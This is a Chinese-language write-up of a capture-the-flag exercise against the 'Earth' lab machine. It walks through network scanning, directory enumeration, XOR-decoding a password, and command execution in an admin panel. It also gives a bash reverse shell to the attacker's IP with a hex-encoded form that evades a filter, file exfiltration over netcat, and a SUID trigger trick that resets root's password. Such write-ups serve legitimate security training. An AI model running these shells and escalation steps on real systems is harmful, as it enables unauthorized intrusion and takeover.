下载靶机:下载地址
下载后直接在vm打开,把靶机和kali网络配置成NAT模式。
开启靶机,查看MAC地址。
打开kali使用命令arp-scan -l查看靶机ip:192.168.195.132
nmap -A 192.168.195.132
查看开放的端口,能看到打开了80和443端口,443端口还有两个DNS地址
尝试查看ip页面,发现什么也没有,这里需要把两条DNS地址写到hosts文件里
需要用到命令vim /etc/hosts进入后点i开始编辑,添加完成后点esc退出,最后输入:wq保存并退出
cat /etc/hosts查看编辑后的host
访问https://earth.local与https://terratest.earth.local
在https://earth.local最下面发现了三段加密信息
另外一个没有发现什么有用的信息。
dirb https://earth.local/
dirb https://terratest.earth.local/
扫描两个站点目录
访问https://earth.local/admin/login 是一个登录地址
访问https://terratest.earth.local/robots.txt 发现一个比较特别的
Disallow: /testingnotes.* 尝试后发现是一个testingnotes.txt,查看得到相应提示
翻译一下
得到一些信息,三段信息可能使用的是XOR算法进行的加密,曾经发送过信息,存在一个txt的测试加密,可以通过这个txt获得加密方式,用户名是terra,密码目前未知。访问testdata.txt
使用网站https://gchq.github.io/CyberChef/ 可以解出3段密码
也可以写脚本,这里我用的是网站:先将previous message从16进制数转化为UTF-8,再与message进行XOR运算,message就是testdata.txt的内容,XOR运算也使用UTF-8编码
把testdata.txt的内容写到XOR的key中,第三段解出了需要的东西,查看发现是重复的内容,可能是登陆密码
尝试登录
尝试输入一些命令ls,发现可以执行,尝试反弹shell
bash -i >& /dev/tcp/192.168.195.128/1234 0>&1
发现不能用,上网搜索后知道了这里要把ip进行16进制编码
bash -i >& /dev/tcp/0xc0.0xa8.0xc3.0x80/1234 0>&1
使用find命令查找一下flag
find / -name "*flag.txt"
查看可以得到user_flag
现在只有网站权限,尝试提权到root先看下suid有些什么信息,看到这个命令
find / -perm -u=s -type f 2>/dev/null
使用这个命令,看到一条信息:大概意思是修改root密码为Earth
尝试执行reset_root提示触发器不存在,
由于靶机没有ltrace,所以将/usr/bin/reset_root传到本地分析
kali攻击机监听2222端口,并将接收到的内容重定向到文件reset_root
nc -lvvp 2222 > reset_root
靶机上将/usr/bin/reset_root文件的内容通过nc重定向到攻击机的2222端口
nc 192.168.124.129 2222 < /usr/bin/reset_root
可以看出会检查触发器是否存在为条件,这里就是/dev/shm/kHgTFI5G、/dev/shm/Zw7bV9U5、/tmp/kcM0Wewe这3个文件夹都需要存在
那么在靶机上创建这三个文件夹,再执行reset_root,成功重置root密码为Earth
这里可以登录拿到flag
